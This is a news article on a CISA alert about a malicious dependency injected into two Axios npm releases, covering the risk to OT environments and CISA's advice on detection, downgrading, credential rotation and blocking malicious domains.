The U.S. CISA (Cybersecurity and Infrastructure Security Agency) issued an alert warning of a supply chain compromise affecting the Axios npm package, urging organizations to take immediate steps to detect and remediate any exposure linked to the affected versions. Axios is one of the more ubiquitous tools in the JavaScript ecosystem, a widely used HTTP client embedded across Node.js and browser-based applications, which means the incident has the potential to touch various development environments.
“On March 31, 2026, two npm packages for versions [email protected] and [email protected] of Axios npm injected the malicious dependency [email protected] that downloads multi-stage payloads from cyber threat actor infrastructure, including a remote access trojan,” CISA wrote in its Monday alert.
While on the surface, Axios appears to be a standard web and IT component, the risk profile shifts significantly when examined through the lens of how modern OT (operational technology) environments are designed and maintained.
The risk of attackers moving from IT systems into OT environments is no longer a hypothetical concern. Compromised developer environments and CI/CD pipelines have become realistic entry points into industrial networks, especially as many organizations now run shared DevOps pipelines to support HMI dashboards, IIoT applications, and data integration. A remote access trojan slipped in during a routine package installation can quietly collect credentials, tokens, and SSH keys before anyone notices, which is precisely why CISA is telling organizations to assume they are already compromised and rotate credentials immediately.
The problem runs deeper as web technologies become more common inside OT environments. Axios is embedded in industrial web dashboards, edge and IIoT gateways, and the API layers that connect cloud systems to plant-floor operations. It does not sit at the level of PLCs or direct control systems, but it lives in the connective tissue between IT and OT environments, a layer where visibility appears thin and security controls are often an afterthought.
At a broader level, this incident is a reminder of how much supply chain attacks have matured. A single compromised package can ripple across thousands of downstream systems, with malicious code executing at build or installation time, well before any runtime defenses have a chance to respond. In OT environments, where build pipelines and software dependencies are routinely trusted without meaningful verification, that window of exposure is especially difficult to close.
CISA advised organizations to monitor and review code repositories, CI/CD pipelines, and developer machines that executed npm install or npm update using the compromised packages. Organizations should also search for cached versions of affected dependencies within artifact repositories and dependency management tools, while pinning npm package dependencies to known safe releases to prevent further exposure.
If compromised dependencies are identified, environments should be reverted to a known safe state. This includes downgrading to [email protected] or [email protected] and removing the malicious plain-crypto-js package from node_modules. At the same time, any credentials that may have been exposed must be rotated or revoked, including version control system tokens, CI/CD secrets, cloud keys, npm tokens, and SSH keys. In cases involving ephemeral CI jobs, all secrets injected into the compromised runs should be rotated without exception.
CISA further recommends monitoring for unusual child processes and anomalous network behavior, particularly during npm installation or update processes. Organizations should block and track outbound connections to known malicious domains such as Sfrclak domains, and carry out continuous indicator searches alongside endpoint detection and response hunts to ensure no indicators of compromise remain and that no further command-and-control communication persists.
Beyond immediate remediation, CISA recommends that organizations using Axios npm mandate phishing-resistant multifactor authentication (MFA) across developer accounts, especially for critical platforms. They must also make changes in the configuration file to prevent potentially malicious scripts from executing during npm package installation. In addition, they must ensure only packages that have been published for at least seven days are installed, reducing the risk of pulling in unvetted or potentially malicious dependencies.
Furthermore, organizations must establish and maintain a baseline of normal execution behavior for tools that use Axios. They must also use an alert when a dependency behaves differently, such as building containers, enabling shells, and executing commands, and trace outbound network activity for anomalous connections.
